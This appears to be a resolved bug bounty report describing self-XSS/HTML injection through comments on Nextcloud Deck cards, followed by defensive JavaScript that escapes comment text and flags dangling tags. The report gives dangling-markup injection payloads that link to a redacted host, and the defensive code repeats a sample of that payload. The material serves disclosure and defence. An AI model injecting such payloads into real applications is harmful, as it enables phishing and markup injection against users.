Self XSS when sending HTML as a comment in the Deck app
Vulnerability Details
Hi Team,
I hope you are doing well.
I found an XSS/HTML Injection Via Comments in Deck Cards.
Vulnerability Name :- XSS/HTML Injection Via Comments in Deck Cards
Vulnerability Description :- Hi Team, I found an XSS/HTML Injection Via Comments in Deck Cards, which leads to one-time malicious script execution.
I performed my testing on localhost with the latest version of Nextcloud, 27.0.0.8.
{F2481183}
Steps to Reproduce :-
1. Set up the Nextcloud instance locally.
2. After setting up locally --> log in.
3. After that, go to Deck --> Create Cards --> click on that card --> go to comments.
4. Enter this payload in comments :- `<a href=http://██████/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="`
5. You can also use this --> `<a href=http://███████/dangling_markup/name.html><font size=100 color=blue>You Hacked by BhaRat</font></a><base target="`
6. Put this script in comments, click and send, and Boom! You see the one-time execution.
7. An attacker can easily find a way to make it persistent or execute their malicious script once.
## Impact
1. Malicious Script Execution.
2. If an attacker is able to make it persistent --> it leads to cookie stealing and account takeover.
POC Attached
If you need further info I am here to help you.
Thanks and Regards,
BhaRat
Report Stats
- Report ID: 2058556
- State: Closed
- Substate: resolved
- Upvotes: 20
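
One way to keep a comment like the payloads in steps 4 and 5 inert is to HTML-encode it before it reaches an HTML sink, and to flag unterminated tags when triaging stored comments. This is an added example, not part of the original report and not Nextcloud Deck's code; the function names and the `example.invalid` host (standing in for the redacted one) are assumptions.

```javascript
// Added example, not Nextcloud Deck code. All names here are hypothetical.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode every character that can open a tag, an entity or an attribute value.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Build the markup for one comment: encode first, then add the only tags we own.
function renderComment(text) {
  const encoded = escapeHtml(text).replace(/\r?\n/g, '<br>');
  return `<div class="comment-body">${encoded}</div>`;
}

// Triage helper for stored comments: list opening tags and flag dangling ones,
// i.e. tags with no closing '>' or with an unbalanced quote in their attributes.
function markupFindings(text) {
  const tags = [];
  const dangling = [];
  const tagRe = /<([a-zA-Z][a-zA-Z0-9]*)([^>]*)(>?)/g;
  for (const [, name, attrs, close] of String(text).matchAll(tagRe)) {
    const tag = name.toLowerCase();
    tags.push(tag);
    const oddQuotes = (attrs.match(/"/g) || []).length % 2 === 1;
    if (close === '' || oddQuotes) dangling.push(tag);
  }
  return { tags, dangling };
}

// Constructed sample: the report's payload shape with a placeholder host.
const SAMPLE_COMMENT =
  '<a href=http://example.invalid/dangling_markup/name.html>' +
  '<font size=100 color=red>You must click me</font></a><base target="';

console.log(renderComment(SAMPLE_COMMENT));
console.log(markupFindings(SAMPLE_COMMENT));
```

The encoded output contains no raw `<`, `>` or `"` from the comment, so the trailing `<base target="` cannot absorb the markup that follows it on the page.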